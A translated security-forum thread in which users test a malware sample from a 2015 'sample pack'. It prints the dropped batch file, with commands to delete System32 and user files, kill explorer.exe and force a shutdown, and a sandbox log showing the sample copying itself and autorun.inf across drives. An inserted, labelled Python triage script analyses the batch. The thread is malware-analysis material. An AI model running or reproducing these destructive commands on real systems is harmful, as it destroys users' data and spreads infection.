Views: 3599 | Replies: 17

[Virus sample] One file from the 8.23 elite sample pack

微光丶
Posted 2015-8-23 17:21:27
This post was last edited by 微光丶 on 2015-8-23 17:50

ESET didn't detect many of them, so I renamed them to .exe and double-clicked each one in turn, and that's how I found this thing.
Password: kafan
Habo analysis: http://habo.qq.com/file/showdetail?pk=ADIGZ11qB2UIOw==

FireEye (ijinshan): http://fireeye.ijinshan.com/anal ... 795&type=1#full


Files dropped while single-stepping it in OD (OllyDbg)

Password: kafan

ericdj
Posted 2015-8-23 17:28:55
BD: right-click scan missed it

Right-click, run in sandbox
Windows SmartScreen warning


After allowing it through, a while later a large number of cmd.exe windows popped up

微光丶
OP | Posted 2015-8-23 17:51:01
ericdj posted on 2015-8-23 17:28
BD: right-click scan missed it

Right-click, run in sandbox

It drops a bat file and then runs shutdown -s -t 60 -c
微光丶
OP | Posted 2015-8-23 17:52:45
Actually I'm not sure whether the one in the C: root was dropped by this thing; I double-clicked so many that I've kind of forgotten. But the one in the Temp directory definitely was.
微光丶
OP | Posted 2015-8-23 18:00:39

FireEye can't analyze it, and Habo won't even accept the upload

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
微光丶
OP | Posted 2015-8-23 18:14:27
Contents of tmp68851.bat [some parts masked out]
It deletes C:\Windows\System32, but that doesn't seem to have any effect

[mw_shl_code=dos,true]@echo off
REM Staging paths under the user's Temp directory and the name of the dropped executable
set ztmp=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ytmp
set MYFILES=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\afolder
set bfcec=tmp42711.exe
set cmdline=
SHIFT /0
@echo off
REM '//' is not a comment marker in batch (only REM and :: are); cmd.exe tries to run each of these lines and fails with "not recognized"
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
REM A bare start opens a new cmd.exe console window
start
@echo off
REM rd accepts only /S and /Q; cmd.exe rejects this line with "Invalid switch", so nothing is deleted
rd /S /F C:\Windows\System32
REM Parts of the next two lines were masked by the poster
del /S /F "exe
del /S /F "mp3
REM These two lines also start with '//', so they are executed (and fail) rather than commented out
//taskkill /f /im "explorer.exe"
//shutdown -s -f -t 60 -c "Pene tieso y flacido al mismo tiempo"[/mw_shl_code]
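An added example, not code from the thread or from the sample: a small static triage script for dropped batch files like tmp68851.bat. It encodes two cmd.exe facts that explain what the poster saw. First, `//` is not a comment marker in batch (only `REM` and `::` are), so every `//start` line is actually executed and fails with "not recognized"; second, `rd` accepts only `/S` and `/Q`, so `rd /S /F C:\Windows\System32` is rejected by cmd.exe with "Invalid switch" and deletes nothing. `SAMPLE_BAT` is a constructed excerpt modelled on the posted script (it reuses the Temp paths and `tmp42711.exe` name for realism but is not the original file), and the command and switch tables are this example's own, not from any vendor tool.

```python
"""Static triage of a dropped Windows batch script (.bat/.cmd).

Added example, not part of the kafan thread. Classifies each line as
staging, a dormant '//' line, a console spawn, a broken destructive
command (invalid switch, so cmd.exe does nothing) or a working
destructive command.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Built-ins and tools whose presence in a dropped script deserves attention.
DESTRUCTIVE = {
    "rd": "recursive directory removal",
    "rmdir": "recursive directory removal",
    "del": "file deletion",
    "erase": "file deletion",
    "shutdown": "forced shutdown or reboot",
    "taskkill": "process termination",
    "format": "volume format",
    "vssadmin": "shadow-copy tampering",
}

# Switches cmd.exe actually accepts for the file-deletion built-ins. rd knows
# only /S and /Q; any other switch (e.g. /F) makes cmd.exe reject the whole
# command with "Invalid switch". Commands not listed get no switch validation.
VALID_SWITCHES = {
    "rd": {"/s", "/q"},
    "rmdir": {"/s", "/q"},
    "del": {"/p", "/f", "/s", "/q", "/a"},
    "erase": {"/p", "/f", "/s", "/q", "/a"},
}

# A 'set' whose value points into a Temp directory or at an executable is
# typical dropper staging.
STAGING_HINT = re.compile(r"\\temp\\|\.(exe|dll|bat|cmd|vbs)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str      # staging | not_a_comment | spawn | broken | destructive
    text: str
    detail: str


def analyze_batch(script: str) -> list[Finding]:
    """Return one Finding per noteworthy line of a batch script."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        upper = line.upper()
        # Only REM and :: introduce comments in batch.
        if upper == "REM" or upper.startswith("REM ") or line.startswith("::"):
            continue
        if line.startswith("//"):
            findings.append(Finding(line_no, "not_a_comment", line,
                "'//' is not a comment marker; cmd.exe runs this line and fails "
                "with 'not recognized', so the command is dormant, not disabled"))
            continue
        tokens = line.lstrip("@").split()   # '@' only suppresses echo
        if not tokens:
            continue
        cmd = tokens[0].lower()
        if cmd == "set" and "=" in line and STAGING_HINT.search(line):
            findings.append(Finding(line_no, "staging", line,
                "variable points at a Temp path or an executable: dropper staging"))
        elif cmd == "start" and len(tokens) == 1:
            findings.append(Finding(line_no, "spawn", line,
                "bare 'start' opens a new cmd.exe console window"))
        elif cmd in DESTRUCTIVE:
            # '/A:H' style switches are compared on the part before the colon.
            switches = {t.split(":")[0].lower() for t in tokens[1:] if t.startswith("/")}
            allowed = VALID_SWITCHES.get(cmd)
            bad = sorted(switches - allowed) if allowed is not None else []
            if bad:
                findings.append(Finding(line_no, "broken", line,
                    f"invalid switch {bad}: cmd.exe rejects the whole command, nothing is deleted"))
            else:
                findings.append(Finding(line_no, "destructive", line, DESTRUCTIVE[cmd]))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per kind, e.g. {'broken': 1, 'destructive': 1, ...}."""
    return dict(Counter(f.kind for f in findings))


# Constructed excerpt modelled on tmp68851.bat as posted; not the original file.
SAMPLE_BAT = r"""@echo off
set ztmp=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ytmp
set bfcec=tmp42711.exe
set cmdline=
SHIFT /0
//start
start
rd /S /F C:\Windows\System32
del /S /F *.mp3
//taskkill /f /im "explorer.exe"
//shutdown -s -f -t 60 -c "message"
REM genuine comment, ignored
"""

if __name__ == "__main__":
    for f in analyze_batch(SAMPLE_BAT):
        print(f"{f.line_no:3} {f.kind:14} {f.text!r}: {f.detail}")
```

Run it directly to print one line per finding for the constructed sample; for a real dropped script, pass the file's contents to `analyze_batch`. The "broken" class is the practical takeaway: a destructive-looking line that cmd.exe rejects outright, which is why deleting System32 had no visible effect, whereas the `del` line with valid switches would run.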
230f4
Posted 2015-8-23 18:16:29
Submitted to the vendors
电脑发烧友
Posted 2015-8-23 18:16:56
Ran it. Without the sandbox, it intercepted one file in the D: root and that was it.
[mw_shl_code=css,true]  <?xml version="1.0" encoding="utf-16" ?>
<vscope ver="2.0">
<process pid="9036" path="C:\Users\wuliao\Desktop\释放的文件\c盘根目录\Infection.exe" cmdline="" createtime="2015-08-23T10:15:36.996Z" termtime="2015-08-23T10:15:40.127Z" sha1="2D7D9B2E12F7666A44313DF14F2EA6A329D8FB91" hashCrc32="31848307" trusted="false" detected="false" restrictionLevel="KioskClientRestriction" parentpath="C:\Program Files\COMODO\COMODO Internet Security\virtkiosk.exe">
<activities>
  <activity timestamp="2015-08-23T10:15:36.677Z" id="487357" type="LoadImageFile" path="C:\WINDOWS\SYSTEM32\WOW64.DLL" />
  <activity timestamp="2015-08-23T10:15:36.677Z" id="487358" type="LoadImageFile" path="C:\WINDOWS\SYSTEM32\WOW64WIN.DLL" />
  <activity timestamp="2015-08-23T10:15:36.678Z" id="487360" type="LoadImageFile" path="C:\WINDOWS\SYSTEM32\WOW64CPU.DLL" />
  <activity timestamp="2015-08-23T10:15:36.681Z" id="487362" type="LoadImageFile" path="C:\Windows\SysWOW64\mscoree.dll" />
  <activity timestamp="2015-08-23T10:15:36.754Z" id="487403" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\GUARD32.DLL" />
  <activity timestamp="2015-08-23T10:15:36.756Z" id="487405" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\SECHOST.DLL" />
  <activity timestamp="2015-08-23T10:15:36.764Z" id="487410" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\VERSION.DLL" />
  <activity timestamp="2015-08-23T10:15:36.765Z" id="487411" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\IMM32.DLL" />
  <activity timestamp="2015-08-23T10:15:36.769Z" id="487417" type="LoadImageFile" path="C:\Windows\Globalization\Sorting\SortDefault.nls" />
  <activity timestamp="2015-08-23T10:15:36.770Z" id="487418" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\FLTLIB.DLL" />
  <activity timestamp="2015-08-23T10:15:36.825Z" id="487455" type="LoadImageFile" path="C:\Windows\SysWOW64\cmdvrt32.dll" />
  <activity timestamp="2015-08-23T10:15:36.923Z" id="487460" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\KERNELBASE.DLL" />
  <activity timestamp="2015-08-23T10:15:37.000Z" id="487463" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\NTDLL.DLL" />
  <activity timestamp="2015-08-23T10:15:37.001Z" id="487464" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\KERNEL32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.003Z" id="487468" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\USER32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.004Z" id="487470" type="LoadImageFile" path="C:\Windows\SysWOW64\ADVAPI32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.117Z" id="487639" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\OLE32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.118Z" id="487641" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\GDI32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.228Z" id="487763" type="KernelObject" name="\Sessions\1\BaseNamedObjects\mchMixCache$234c!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.229Z" id="487767" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718ff70!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.230Z" id="487772" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771906f0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.232Z" id="487777" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190870!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.233Z" id="487782" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771907e0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.234Z" id="487787" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190000!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.236Z" id="487796" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190080!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.238Z" id="487805" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191cb0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.240Z" id="487814" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191d88!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.241Z" id="487823" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fcac!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.243Z" id="487832" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190690!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.244Z" id="487837" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190df0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.246Z" id="487846" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191be0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.248Z" id="487855" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718ffa0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.249Z" id="487860" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fdc4!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.250Z" id="487865" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771900b0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.251Z" id="487870" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fd60!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.252Z" id="487875" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718febc!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.253Z" id="487879" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $7718febc" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.254Z" id="487885" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190888!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.255Z" id="487889" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $77190888" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.256Z" id="487895" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190ed4!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.257Z" id="487899" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $77190ed4" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.258Z" id="487905" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fb24!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.259Z" id="487909" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $7718fb24" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.261Z" id="487915" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771908a0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.261Z" id="487919" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $771908a0" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.263Z" id="487925" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771903b4!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.266Z" id="487927" type="LoadImageFile" path="C:\Users\wuliao\Desktop\释放的文件\c盘根目录\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:37.499Z" id="487929" type="LoadImageFile" path="C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll" />
  <activity timestamp="2015-08-23T10:15:37.579Z" id="487932" type="LoadImageFile" path="C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll" />
  <activity timestamp="2015-08-23T10:15:37.588Z" id="487937" type="KernelObject" name="\BaseNamedObjects\Cor_Private_IPCBlock_9036!comodo_6" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.588Z" id="487938" type="KernelObject" name="\BaseNamedObjects\Cor_Public_IPCBlock_9036!comodo_6" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.588Z" id="487939" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Global\CorDBIPCSetupSyncEvent_9036!comodo_6" isCreate="true" objectType="Event" />
  <activity timestamp="2015-08-23T10:15:37.750Z" id="487953" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\SHELL32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.751Z" id="487956" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7558534a!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.751Z" id="487958" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $7558534a" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.753Z" id="487963" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75361e06!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.754Z" id="487965" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $75361e06" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.756Z" id="487974" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7559b4d1!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.757Z" id="487976" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $7559b4d1" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.758Z" id="487981" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75399708!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.759Z" id="487983" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $75399708" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.772Z" id="487987" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\PROFAPI.DLL" />
  <activity timestamp="2015-08-23T10:15:38.210Z" id="488027" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll" />
  <activity timestamp="2015-08-23T10:15:38.221Z" id="488034" type="LoadImageFile" path="C:\Windows\system32\rpcss.dll" />
  <activity timestamp="2015-08-23T10:15:38.327Z" id="488041" type="LoadImageFile" path="C:\Windows\SysWOW64\uxtheme.dll" />
  <activity timestamp="2015-08-23T10:15:38.413Z" id="488057" type="LoadImageFile" path="C:\Program Files (x86)\ADSafe\adsPop32.dll" />
  <activity timestamp="2015-08-23T10:15:38.485Z" id="488065" type="LoadImageFile" path="C:\Program Files (x86)\ADSafe\adsNet32.dll" />
  <activity timestamp="2015-08-23T10:15:38.493Z" id="488072" type="LoadImageFile" path="C:\Windows\SysWOW64\l_intl.nls" />
  <activity timestamp="2015-08-23T10:15:38.512Z" id="488074" type="LoadImageFile" path="C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll" />
  <activity timestamp="2015-08-23T10:15:38.621Z" id="488084" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\System\908ba9e296e92b4e14bdc2437edac603\System.ni.dll" />
  <activity timestamp="2015-08-23T10:15:38.696Z" id="488105" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\238f7a4a7dba5830d5aa15b99bdcc848\Microsoft.VisualBasic.ni.dll" />
  <activity timestamp="2015-08-23T10:15:38.717Z" id="488112" type="LoadImageFile" path="C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp" />
  <activity timestamp="2015-08-23T10:15:38.718Z" id="488113" type="LoadImageFile" path="C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prcp.nlp" />
  <activity timestamp="2015-08-23T10:15:38.718Z" id="488114" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NLS_00000804_Exception_Table_3_2!comodo_6" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:38.718Z" id="488115" type="LoadImageFile" path="C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp" />
  <activity timestamp="2015-08-23T10:15:38.749Z" id="488116" type="LoadImageFile" path="C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll" />
  <activity timestamp="2015-08-23T10:15:38.814Z" id="488128" type="LoadImageFile" path="C:\Windows\Microsoft.NET\Framework\v2.0.50727\zh-CHS\mscorrc.dll" />
  <activity timestamp="2015-08-23T10:15:38.893Z" id="488130" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5a401fd2a7689ff13fb54182953f9c40\System.Drawing.ni.dll" />
  <activity timestamp="2015-08-23T10:15:39.406Z" id="488142" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\6949c4470a81970ec3de0a575d93babc\System.Windows.Forms.ni.dll" />
  <activity timestamp="2015-08-23T10:15:39.440Z" id="488149" type="LoadImageFile" path="C:\Windows\SysWOW64\shfolder.dll" />
  <activity timestamp="2015-08-23T10:15:39.445Z" id="488154" type="FindFile" path="C:\" pattern="" />
  <activity timestamp="2015-08-23T10:15:39.445Z" id="488155" type="DeleteFile" path="C:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.599Z" id="488156" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\d49908aa93a23c84847b1f8b1b667860\System.Xml.ni.dll" />
  <activity timestamp="2015-08-23T10:15:39.665Z" id="488166" type="LoadImageFile" path="C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_zh-CHS_b77a5c561934e089\mscorlib.Resources.dll" />
  <activity timestamp="2015-08-23T10:15:39.671Z" id="488174" type="CreateFile" path="C:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.673Z" id="488176" type="ModifyFile" path="C:\Infection.exe:$CmdTcID:$DATA" />
  <activity timestamp="2015-08-23T10:15:39.673Z" id="488178" type="ModifyFile" path="C:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.675Z" id="488180" type="ModifyFile" path="C:\ autorun.inf" />
  <activity timestamp="2015-08-23T10:15:39.676Z" id="488181" type="DeleteFile" path="D:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.679Z" id="488183" type="ModifyFile" path="D:\Infection.exe:$CmdTcID:$DATA" />
  <activity timestamp="2015-08-23T10:15:39.680Z" id="488185" type="CreateFile" path="D:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.682Z" id="488187" type="ModifyFile" path="D:\ autorun.inf" />
  <activity timestamp="2015-08-23T10:15:39.683Z" id="488188" type="DeleteFile" path="E:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.686Z" id="488190" type="ModifyFile" path="E:\Infection.exe:$CmdTcID:$DATA" />
  <activity timestamp="2015-08-23T10:15:39.686Z" id="488192" type="CreateFile" path="E:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.687Z" id="488194" type="ModifyFile" path="E:\ autorun.inf" />
  <activity timestamp="2015-08-23T10:15:39.688Z" id="488195" type="DeleteFile" path="F:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.697Z" id="488197" type="ModifyFile" path="F:\Infection.exe:$CmdTcID:$DATA" />
  <activity timestamp="2015-08-23T10:15:39.697Z" id="488199" type="CreateFile" path="F:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.698Z" id="488201" type="ModifyFile" path="F:\ autorun.inf" />
  <activity timestamp="2015-08-23T10:15:39.753Z" id="488217" type="LoadImageFile" path="C:\Windows\SysWOW64\zh-CN\KernelBase.dll.mui" />
  <activity timestamp="2015-08-23T10:15:39.759Z" id="488224" type="KernelObject" name="\RPC Control\OLE7CFE49F73BCA4EF48E91FDDFADB4" isCreate="true" objectType="Port" />
  <activity timestamp="2015-08-23T10:15:39.771Z" id="488225" type="LoadImageFile" path="C:\Windows\SysWOW64\CRYPTSP.dll" />
  <activity timestamp="2015-08-23T10:15:39.776Z" id="488230" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\RSAENH.DLL" />
  <activity timestamp="2015-08-23T10:15:39.832Z" id="488243" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\RPCRTREMOTE.DLL" />
  <activity timestamp="2015-08-23T10:15:39.838Z" id="488252" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $71af0000!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.841Z" id="488253" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7617ea00!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.843Z" id="488254" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76181804!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.846Z" id="488255" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7663e8a8!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.848Z" id="488256" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $753285b2!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.851Z" id="488257" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $753284eb!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.853Z" id="488258" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327da8!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.854Z" id="488259" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327dc6!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.856Z" id="488260" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327d64!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.857Z" id="488261" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327d47!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.858Z" id="488262" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75324f9c!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.860Z" id="488263" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $761722c1!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.861Z" id="488264" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7673a965!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.863Z" id="488265" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76773553!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.864Z" id="488266" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7673a9ad!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.866Z" id="488267" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $767734d3!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.868Z" id="488268" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $767734c3!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.870Z" id="488269" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7673a97d!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.871Z" id="488270" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7673c7a6!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.873Z" id="488271" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7532a0ff!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.874Z" id="488272" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7532a11d!comodo_6" isCreate="true" objectType="Mutex" />
